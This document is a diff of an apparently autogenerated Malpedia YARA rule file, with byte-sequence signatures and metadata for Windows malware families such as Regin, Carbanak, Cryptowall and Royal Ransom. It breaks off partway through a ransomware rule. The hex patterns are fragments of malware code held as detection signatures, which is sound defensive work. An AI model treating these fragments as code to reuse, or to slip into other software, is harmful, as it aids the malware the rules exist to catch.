+		$sequence_6 = { 8d8d2cfdffff 68???????? 51 e8???????? 83c414 68401f0000 }
+		$sequence_7 = { 6a00 50 898d64ffffff 889568ffffff e8???????? }
+		$sequence_8 = { 8bf1 83e61f 8d3c85c0504100 8b07 c1e606 f644300401 7436 }
+		$sequence_9 = { 8bec 8b4508 56 8d34c550224100 833e00 7513 }
 
 	condition:
-		7 of them and filesize < 2992128
+		7 of them and filesize < 217088
 }
-rule MALPEDIA_Win_Regin_Auto : FILE
+rule MALPEDIA_Win_Dragonbreath_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a1f14e6-74a8-59d6-b749-05fe8ab02b70"
+		id = "dce0b381-95ab-5aa0-a119-0eedad899009"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.regin_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dragonbreath"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dragonbreath_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "c115cb715f448d4a7161dd2f6e1e57adc27409e679a96be3c8017531a1cc0da9"
+		logic_hash = "f0cd4604abe67553fcedb3fe371f55dd5d5d8e023a81a960ca3c6bc06a72d951"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127257,34 +127169,34 @@ rule MALPEDIA_Win_Regin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48 8bd3 e8???????? 40 32ff 48 8b5c2450 }
-		$sequence_1 = { 41 ffc0 48 8d4c2470 41 b904000000 }
-		$sequence_2 = { 85c0 740d 48 8d3551070000 }
-		$sequence_3 = { 48 0f45c7 4c 3be1 }
-		$sequence_4 = { 7408 33db 895c2460 eb7c 48 }
-		$sequence_5 = { 7505 e8???????? e8???????? 85c0 7518 e8???????? }
-		$sequence_6 = { 3beb 7406 ff15???????? 8ac3 48 8b9c2490000000 }
-		$sequence_7 = { 83ec28 83c8ff 48 85c9 }
-		$sequence_8 = { 89442478 48 85c0 0f84e8000000 }
-		$sequence_9 = { 4c 8d4008 48 8d5010 e8???????? 3ac3 }
+		$sequence_0 = { 83c410 eb14 8d8590fdffff 50 }
+		$sequence_1 = { 68???????? 8d4da8 51 e8???????? 8b7de4 }
+		$sequence_2 = { 8b5dd0 ebab c745e470820110 817de47c820110 7311 }
+		$sequence_3 = { 33db 8945c8 895dcc 895dd0 c745e80f000000 895de4 885dd4 }
+		$sequence_4 = { 2bcf b879787878 f7e9 c1fa07 8bf2 }
+		$sequence_5 = { 8dbd84fcffff 68ff010000 f3a5 8d8df5fdffff 6a00 51 }
+		$sequence_6 = { c1e006 8b0c8d80fb0110 8d440104 8020fe ff36 e8???????? 59 }
+		$sequence_7 = { e8???????? 85ff 7407 57 ff15???????? 8b8558fdffff 8b4df0 }
+		$sequence_8 = { 51 ff15???????? 46 3bb424dc110000 72e8 e9???????? }
+		$sequence_9 = { 8bd6 69d200a4d9fa 03ca b8b17c2195 f7e1 8bda c1eb15 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 295936
 }
-rule MALPEDIA_Win_Shimrat_Auto : FILE
+rule MALPEDIA_Win_Badcall_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b3f34c04-651c-587d-bd77-b7f0b88267a0"
+		id = "233fe049-459f-50da-b51f-73303606a185"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shimrat_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badcall_auto.yar#L1-L239"
 		license_url = "N/A"
-		logic_hash = "f6aefe8dd1d3b634b60800b8c047d2a812717e57ed1af7e84c8f3a77485271ec"
+		logic_hash = "cbbb68fc4f4ef6dd9bf8f48d22c329386c6109c255e88f35209d20a078bb6b07"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -127296,34 +127208,48 @@ rule MALPEDIA_Win_Shimrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 ff750c 8b4d08 e8???????? 8b4508 5f }
-		$sequence_1 = { 6aff ff75fc 56 ff7514 ffd7 8bd8 8d4301 }
-		$sequence_2 = { 8d4d50 e8???????? ff7570 e8???????? 8d4d50 }
-		$sequence_3 = { 85ff 7e1a 8b19 ff742410 8d0433 50 e8???????? }
-		$sequence_4 = { ff15???????? 895df8 3bc3 0f8483000000 }
-		$sequence_5 = { 53 8d45e8 56 50 e8???????? 6a02 }
-		$sequence_6 = { 742e 837dfc04 7519 68???????? ff75f8 e8???????? 59 }
-		$sequence_7 = { 8d4ddc e8???????? 85c0 754b 8d4df0 e8???????? }
-		$sequence_8 = { 33c0 40 c3 a810 7404 }
-		$sequence_9 = { ff15???????? c20400 55 8bec 81ec88000000 8365ec00 53 }
+		$sequence_0 = { ff15???????? b907000000 33c0 8d7c240d }
+		$sequence_1 = { 85c0 754b bf???????? 83c9ff f2ae f7d1 49 }
+		$sequence_2 = { c644240c00 f3ab 66ab 8d4c242c c744240800000000 aa }
+		$sequence_3 = { 8bf1 89742404 8d4e18 e8???????? }
+		$sequence_4 = { 53 57 33db b97f000000 33c0 8dbc2415010000 }
+		$sequence_5 = { 89442412 8bf1 6685ff 66c74424080000 6689442416 746d 6a06 }
+		$sequence_6 = { e8???????? 85c0 7429 8b5604 8d4c240c 51 687e660480 }
+		$sequence_7 = { 56 89442406 57 8b7c241c 8944240e }
+		$sequence_8 = { 8b44242c 85c0 0f848a020000 33c9 48 }
+		$sequence_9 = { 8b742410 8d0c12 57 8bd9 33c0 8bfe 52 }
+		$sequence_10 = { 8b4c2410 85c9 0f849f080000 8bd1 8bcd }
+		$sequence_11 = { c1e902 f3a5 8bc8 8b442468 83e103 }
+		$sequence_12 = { 5f 898834010000 5e 33c0 }
+		$sequence_13 = { 750f 8b4614 85c0 0f87c2feffff 8b442414 8b442410 5f }
+		$sequence_14 = { 899014020000 8b94241c010000 898818020000 8b8c2420010000 89901c020000 }
+		$sequence_15 = { 899518010000 8b542414 85d2 7409 52 }
+		$sequence_16 = { 3bd1 7d06 ebda 3bd1 }
+		$sequence_17 = { 81ec2c010000 55 68???????? ff15???????? }
+		$sequence_18 = { e8???????? 8b442464 6a01 8d4c242c 6a04 51 57 }
+		$sequence_19 = { 5e 85c0 7406 33c0 83c454 c3 }
+		$sequence_20 = { 8bb6a48b0110 eb06 8bb6d88b0110 3bce 7e20 83e907 }
+		$sequence_21 = { 83c40c e9???????? 6a00 6883341200 57 c744242401000000 }
+		$sequence_22 = { 8d7c240d c644240c00 f3ab 8b35???????? 68???????? }
+		$sequence_23 = { 6a00 688f341200 56 e8???????? 83c40c 57 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 483328
 }
-rule MALPEDIA_Win_Interception_Auto : FILE
+rule MALPEDIA_Win_Batel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f1a298d5-70e2-5f27-b6ee-691574cd9abf"
+		id = "ce5297ec-2628-56fe-90d3-14a58de70bd5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.interception"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.interception_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.batel_auto.yar#L1-L219"
 		license_url = "N/A"
-		logic_hash = "3520af3329a4b24d818d777e1e8f70b92d9cafa69a1f58bf6db64da9ed00530f"
+		logic_hash = "be5c7cfc92fc63831f946ba5608b114c38a6759dff1e1a478b017b493c38ecb1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -127335,32 +127261,43 @@ rule MALPEDIA_Win_Interception_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e61f 8d1c8520ae0010 c1e603 8b03 f644300401 7469 57 }
-		$sequence_1 = { 72f1 56 8bf1 c1e603 3b96e8710010 }
-		$sequence_2 = { c1f805 83e61f 8d1c8520ae0010 c1e603 8b03 }
-		$sequence_3 = { ffb6ec710010 8d8560ffffff 50 e8???????? 6810200100 8d8560ffffff }
-		$sequence_4 = { 8bd0 c1f905 83e21f 8b0c8d20ae0010 f644d10401 }
-		$sequence_5 = { 8d3c8520ae0010 c1e603 8b07 03c6 f6400401 7437 }
-		$sequence_6 = { f683c19c001004 7406 8816 46 }
-		$sequence_7 = { 8d542434 f3ab 66ab aa }
-		$sequence_8 = { 8bc8 83e01f c1f905 8b0c8d20ae0010 8a44c104 }
-		$sequence_9 = { 731c 8bc8 83e01f c1f905 8b0c8d20ae0010 f644c10401 8d04c1 }
+		$sequence_0 = { 33c0 5b c21000 3b0d???????? 7502 }
+		$sequence_1 = { eb35 a1???????? 81b80000230050450000 75eb b90b010000 66398818002300 }
+		$sequence_2 = { 7412 ffd0 56 ffd3 68005c2605 ffd5 47 }
+		$sequence_3 = { 8bec 81eca0020000 68ee020000 ff15???????? 689d020000 }
+		$sequence_4 = { 85f6 7422 68???????? 56 ff15???????? 85c0 7412 }
+		$sequence_5 = { 57 6a40 6800100000 689e020000 }
+		$sequence_6 = { 68005c2605 ffd5 47 83ff5a 7ccd 5f 5e }
+		$sequence_7 = { 55 8b2d???????? 56 57 68a00f0000 ffd5 8b1d???????? }
+		$sequence_8 = { 33c9 b8???????? 8a10 88940d60fdffff }
+		$sequence_9 = { 6868212300 e8???????? 33db 895de4 8d4594 50 ff15???????? }
+		$sequence_10 = { 8935???????? 68d0202300 68c4202300 e8???????? 59 59 }
+		$sequence_11 = { 66a5 ffd0 5f 5e }
+		$sequence_12 = { e9???????? 6894152300 e8???????? a1???????? c704242c302300 ff35???????? }
+		$sequence_13 = { ff15???????? 689d020000 8d8561fdffff 6a00 50 }
+		$sequence_14 = { 50 c68560fdffff00 e8???????? 83c40c 33c9 }
+		$sequence_15 = { 41 3d???????? 7cec 56 57 }
+		$sequence_16 = { 8b1d???????? bf01000000 8d642400 68???????? ff15???????? 8bf0 85f6 }
+		$sequence_17 = { c745fc00000000 6800002300 e8???????? 83c404 85c0 }
+		$sequence_18 = { 689e020000 6a00 ff15???????? 8bf8 b9a7000000 8db560fdffff f3a5 }
+		$sequence_19 = { c3 8bff 56 b858212300 be58212300 57 }
+		$sequence_20 = { 7419 ffd0 56 ffd3 68404c5827 ff15???????? 47 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Avcrypt_Auto : FILE
+rule MALPEDIA_Win_Shimrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6717dbdb-f4ba-5c23-a152-195fba62bfc4"
+		id = "b3f34c04-651c-587d-bd77-b7f0b88267a0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avcrypt_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shimrat_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "88e8fd00aad138bd5391f93ff200b42a3193bfb4856f2e79b29034d74d91998c"
+		logic_hash = "f6aefe8dd1d3b634b60800b8c047d2a812717e57ed1af7e84c8f3a77485271ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127374,32 +127311,32 @@ rule MALPEDIA_Win_Avcrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c40c 8d4dc0 e8???????? be???????? c745fc02000000 56 }
-		$sequence_1 = { 0fb7c8 b8ffff0000 663bc1 8b4dec 6a04 58 }
-		$sequence_2 = { ddd8 db2d???????? b801000000 833d????????00 0f8516a20000 ba05000000 8d0d60974300 }
-		$sequence_3 = { 8b00 837dec08 8d4dd8 8bd0 0f434dd8 }
-		$sequence_4 = { e8???????? 59 8365fc00 8b049d80b54300 f644380401 7413 ff7510 }
-		$sequence_5 = { 8ac3 e8???????? c3 68a4020000 b8???????? e8???????? 8bc2 }
-		$sequence_6 = { 68???????? 6a18 6a18 50 e8???????? e8???????? }
-		$sequence_7 = { b44b 5a baa5c94fad 90 302c83 2d2171e50b }
-		$sequence_8 = { 48 7412 e8???????? c70016000000 e8???????? ebb4 c745e440be4300 }
-		$sequence_9 = { 8965c8 68???????? e8???????? 83ec18 c645fc14 8bcc 68???????? }
+		$sequence_0 = { 59 ff750c 8b4d08 e8???????? 8b4508 5f }
+		$sequence_1 = { 6aff ff75fc 56 ff7514 ffd7 8bd8 8d4301 }
+		$sequence_2 = { 8d4d50 e8???????? ff7570 e8???????? 8d4d50 }
+		$sequence_3 = { 85ff 7e1a 8b19 ff742410 8d0433 50 e8???????? }
+		$sequence_4 = { ff15???????? 895df8 3bc3 0f8483000000 }
+		$sequence_5 = { 53 8d45e8 56 50 e8???????? 6a02 }
+		$sequence_6 = { 742e 837dfc04 7519 68???????? ff75f8 e8???????? 59 }
+		$sequence_7 = { 8d4ddc e8???????? 85c0 754b 8d4df0 e8???????? }
+		$sequence_8 = { 33c0 40 c3 a810 7404 }
+		$sequence_9 = { ff15???????? c20400 55 8bec 81ec88000000 8365ec00 53 }
 
 	condition:
-		7 of them and filesize < 6160384
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Darkbit_Auto : FILE
+rule MALPEDIA_Win_Fuxsocy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "376307d8-f183-5168-b430-3c79d528468e"
+		id = "8e4d8f81-20f8-540c-90a5-36985982ab6a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkbit_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fuxsocy_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "3345b8391d558255e8d42c00573b9e9bb419b0424b0535da1de4bc7f3c804298"
+		logic_hash = "dc08d740dcf5db967ba7f125c57f76f52d4f954228326fede3bf43506bd45bbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127413,32 +127350,32 @@ rule MALPEDIA_Win_Darkbit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488b8c2480050000 48894808 833d????????00 7515 488b8c24b0210000 488908 }
-		$sequence_1 = { 488d0505c50f00 4889d9 4889fb 4889f7 4c89c6 e8???????? 488b542450 }
-		$sequence_2 = { eb1a 440fb64c341e 418d1411 8d5293 88543c1e 448844341e 4883c002 }
-		$sequence_3 = { 4c8d4301 4c39c6 7331 488d05052b1700 4889d9 4889fb 4889f7 }
-		$sequence_4 = { eb1c 4889c7 488b8c24d0200000 e8???????? 488d3d4f2a2200 e8???????? 6690 }
-		$sequence_5 = { e8???????? 4889842460100000 48899c2400010000 488b842480000000 48c7c3ffffffff e8???????? 48899c2480140000 }
-		$sequence_6 = { e8???????? 488d0546a23800 bb26000000 e8???????? 90 4889442408 48895c2410 }
-		$sequence_7 = { e8???????? 48898424581c0000 48895c2428 488b0d???????? 48898c24980e0000 488d0547db0700 e8???????? }
-		$sequence_8 = { 488b8c24a8060000 48894808 833d????????00 7514 488b8c24d8220000 488908 488905???????? }
-		$sequence_9 = { 4d89d3 49c1ea2a 4983fa40 0f83d6060000 4c8d25576e5200 4f8b14d4 418402 }
+		$sequence_0 = { 8b0d???????? e8???????? 8b4dfc e8???????? 46 3b35???????? 72c4 }
+		$sequence_1 = { 51 51 51 51 f7d8 51 }
+		$sequence_2 = { 50 6a01 53 ff15???????? 85c0 756e 395c2414 }
+		$sequence_3 = { 8b08 ff5108 8b45e4 5f 5e c9 c3 }
+		$sequence_4 = { ff74241c 8bda 894c2414 ff15???????? 8b7c2418 8be8 8b17 }
+		$sequence_5 = { 50 8d44241c 50 6a00 6a07 6a00 ff742424 }
+		$sequence_6 = { 8954240c 85ff 7474 8b4f04 55 8d54240c e8???????? }
+		$sequence_7 = { 8b45fc 6a5c 5a 66891448 }
+		$sequence_8 = { 83c102 e8???????? 8b16 8b4e1c 8944d104 ff06 }
+		$sequence_9 = { 8954241c 8be9 8364241000 8364241800 8364242400 8d442424 50 }
 
 	condition:
-		7 of them and filesize < 11612160
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Royal_Ransom_Auto : FILE
+rule MALPEDIA_Win_Cryptowall_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b707ba7e-f795-5786-96ea-1fd46c83e33f"
+		id = "50af5d84-6bf2-5e21-963e-da71c1d0aa83"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.royal_ransom_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptowall_auto.yar#L1-L108"
 		license_url = "N/A"
-		logic_hash = "ff950c4f22d55465d57ffb0791253a97dd6631f204494c457bce80921890bdb0"
+		logic_hash = "44ba25f2c9e3be57522d3914736a7aa98c9dc8885fa529ce3340a46dbf9f3527"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127452,32 +127389,32 @@ rule MALPEDIA_Win_Royal_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4c8d059b3b1400 ba8f000000 e9???????? 488b4608 8b08 e8???????? }
-		$sequence_1 = { 803d????????00 754c 488d0d5c220d00 48890d???????? 488d050e1f0d00 488d0d37210d00 488905???????? }
-		$sequence_2 = { e8???????? 482be0 488bfa 488bd9 4885c9 747e 488d156abf0600 }
-		$sequence_3 = { 85c0 0f450d???????? 85c9 7411 488d0d31212400 e8???????? 4885c0 }
-		$sequence_4 = { e8???????? 4c8d0503171400 8d562b 488d0d09171400 e8???????? 4533c0 8d4e10 }
-		$sequence_5 = { c3 e8???????? 4c8d0553bd1400 ba8f010000 488d0d2fbd1400 e8???????? 4533c0 }
-		$sequence_6 = { e8???????? 397010 0f84ccfeffff e8???????? 4c8d052eb91400 ba66000000 488d0deab81400 }
-		$sequence_7 = { 754c e8???????? 4c8d05aeb81600 bae9000000 488d0d8ab81600 e8???????? 4533c0 }
-		$sequence_8 = { e8???????? 4c8d0533510e00 bac1010000 488d0da7500e00 e8???????? 4533c0 8d4f39 }
-		$sequence_9 = { c3 49ff80c0000000 488bcb 488b4308 8b10 e8???????? b801000000 }
+		$sequence_0 = { 50 e8???????? 8b482c ffd1 6a00 }
+		$sequence_1 = { 83ec08 837d0800 7502 eb4f 6a08 6a00 }
+		$sequence_2 = { e8???????? 83c408 99 b91a000000 }
+		$sequence_3 = { 894dfc 837df805 752d 837dfc00 }
+		$sequence_4 = { 83ec18 56 8b450c 50 }
+		$sequence_5 = { 99 b91a000000 f7f9 83c261 8b45f4 }
+		$sequence_6 = { e8???????? 83c408 8b0d???????? 898114010000 }
+		$sequence_7 = { b861000000 668945ee b963000000 66894df0 }
+		$sequence_8 = { 52 e8???????? 8b400c ffd0 }
+		$sequence_9 = { 6880000000 6a00 8d4de8 51 }
 
 	condition:
-		7 of them and filesize < 6235136
+		7 of them and filesize < 417792
 }
-rule MALPEDIA_Win_Knot_Auto : FILE
+rule MALPEDIA_Win_Startpage_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b476922-c990-533b-9ea2-55281d49e06f"
+		id = "5a6b784b-ec8f-5962-9d64-894cc5561282"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.knot_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.startpage_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9a4cc690c1caf46b1d80d5ed99f629971e8f9dd8073d7d2fdb62a67bbf85c7b7"
+		logic_hash = "21d756dfb49cd7d91a800b8f6049ef1f88714f6007f6f320c1aa4c2e5532acfc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127491,32 +127428,32 @@ rule MALPEDIA_Win_Knot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7407 c685f3fdffff00 ebbe 0fb68df3fdffff 83f901 }
-		$sequence_1 = { ff15???????? 85c0 0f855ffdffff 8b958cf9ffff }
-		$sequence_2 = { 6a00 6a02 6a00 8b4df8 51 }
-		$sequence_3 = { 8bec 81ec24020000 e8???????? 8945fc c785ecfdffff02000000 }
-		$sequence_4 = { 7507 32c0 e9???????? 6a00 6a00 6a00 6a02 }
-		$sequence_5 = { 8d8dd0fdffff 51 6a08 8d95c8fdffff }
-		$sequence_6 = { 7454 6a00 6a00 6a00 6a04 8b55f4 52 }
-		$sequence_7 = { 83c40c 8985e8fdffff 8b8de8fdffff 898ddcfdffff 83bddcfdffff03 7402 }
-		$sequence_8 = { 6a00 6a00 6800000040 8d95e0fdffff }
-		$sequence_9 = { e8???????? 8985d0feffff e9???????? 8b8dd4feffff 51 ff15???????? 8be5 }
+		$sequence_0 = { 6801000080 ff15???????? 8b4dd8 8bf0 83c1f0 e8???????? 85f6 }
+		$sequence_1 = { 8b4f18 84040a eb57 8b471c 85c0 741b 8b4808 }
+		$sequence_2 = { 663bc3 75f6 2b8de4deffff d1f9 41 8d344e 8d144a }
+		$sequence_3 = { 1bc0 2516020780 e9???????? 56 8b36 e8???????? 59 }
+		$sequence_4 = { 50 8d4e0c e8???????? 33c0 894610 894614 894618 }
+		$sequence_5 = { 8d7010 89b5e0feffff 8d85e0feffff c645fc0d 50 8d4b1c e8???????? }
+		$sequence_6 = { 85c0 51 0f45d8 c645fc05 53 8d4db8 e8???????? }
+		$sequence_7 = { ff15???????? 6a01 ff758c ff15???????? 8b4588 6a15 8b484c }
+		$sequence_8 = { 7417 56 8b30 50 e8???????? 8bc6 59 }
+		$sequence_9 = { 5b 8be5 5d c3 ff15???????? 0fb7c8 81c900000780 }
 
 	condition:
-		7 of them and filesize < 59392
+		7 of them and filesize < 2277376
 }
-rule MALPEDIA_Win_Opachki_Auto : FILE
+rule MALPEDIA_Win_Bitsloth_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e10cd0eb-a431-57d1-b7ee-f206637aeb79"
+		id = "d21005cc-48c4-5c1b-8a1c-480f484a1c06"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.opachki_auto.yar#L1-L158"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsloth"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bitsloth_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "9a87a4a85fda49db5f8b260ce2dd4c073885fccbbbb43ca421b7fe7db663b448"
+		logic_hash = "b507e5914cce1955d65d2d9ef747d0eb1b6c8dbf2ed2455d47603f8c520d8766"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127530,37 +127467,32 @@ rule MALPEDIA_Win_Opachki_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb69 8b5508 8b4904 53 }
-		$sequence_1 = { 57 6a0d 68???????? 8d4ddc e8???????? 68ff000000 }
-		$sequence_2 = { c3 55 8bec 81ec00010000 ff7508 }
-		$sequence_3 = { ff15???????? 8d8500ffffff 50 ff7508 e8???????? 59 59 }
-		$sequence_4 = { 034604 50 ff15???????? 8b4708 }
-		$sequence_5 = { 57 8b7d0c 8a0f 894508 84c9 744d 8a10 }
-		$sequence_6 = { 894708 c6040800 5b 5f }
-		$sequence_7 = { 33c0 c706???????? 894608 89460c 894604 e8???????? 8bc6 }
-		$sequence_8 = { 2b442424 aa 8944241c 61 }
-		$sequence_9 = { ebc1 3c67 7507 884705 b301 ebb6 }
-		$sequence_10 = { 00f0 8a0c01 f6c101 0f84b9000000 ac 884708 88c5 }
-		$sequence_11 = { 31db 99 b125 f3aa }
-		$sequence_12 = { 83c140 eb0a 3ca0 7206 }
-		$sequence_13 = { 08db 752b 46 88470c 88c4 c0ec06 }
-		$sequence_14 = { 08db 7409 80fe06 750b }
+		$sequence_0 = { 837de800 740e 8b4de8 8b11 8b45e8 50 }
+		$sequence_1 = { eb44 8b45f4 0345ec 8a48ff 884dfc 8b55f4 0355ec }
+		$sequence_2 = { 52 e8???????? 83c40c 8b45f8 83e801 8945f8 837df803 }
+		$sequence_3 = { 034df8 8b5508 898a90af0600 8b4508 81b890af060006010000 7310 8b4d08 }
+		$sequence_4 = { 8b5104 52 8b01 50 8b4df0 e8???????? c745fc00000000 }
+		$sequence_5 = { eb1b 68???????? 8b4df8 51 e8???????? 83c408 }
+		$sequence_6 = { 837df400 751b 6a00 6a00 6812c92300 e8???????? }
+		$sequence_7 = { 8b4d08 89487c 33c0 8b4dfc 33cd e8???????? 8be5 }
+		$sequence_8 = { 6a03 ff15???????? 8985f8ecffff 8d95e4ecffff 52 8d859cecffff 50 }
+		$sequence_9 = { 7515 6a00 6a00 68fa920300 e8???????? 83c40c 33c0 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 677888
 }
-rule MALPEDIA_Win_Ransomlock_Auto : FILE
+rule MALPEDIA_Win_Carbanak_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1d9f68b5-bde6-5cf8-8d3e-ce79b7904787"
+		id = "aedde496-1e00-538c-b489-6c77c5599b0a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ransomlock_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.carbanak_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "ae6cb71ec68ff479f995cb168a9a85eebf5d8c257dade2208e4eb2660cdda6fe"
+		logic_hash = "0f833e010e6f92f115d02deffe6d957025aee9eed313be7bf6c5b84cdc07ff91"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127574,32 +127506,32 @@ rule MALPEDIA_Win_Ransomlock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5120 56 50 ffd2 85c0 }
-		$sequence_1 = { 51 50 66894802 ff15???????? 53 8d9decfbffff }
-		$sequence_2 = { 8b5120 56 50 ffd2 85c0 7807 c745ec01000000 }
-		$sequence_3 = { 83c0ec 52 50 8b01 ffd0 }
-		$sequence_4 = { 8d45b8 50 ff15???????? 6804010000 68???????? ff15???????? e9???????? }
-		$sequence_5 = { 53 53 6a01 68???????? ff15???????? 8bf0 85f6 }
-		$sequence_6 = { 8be5 5d c3 83f801 7408 }
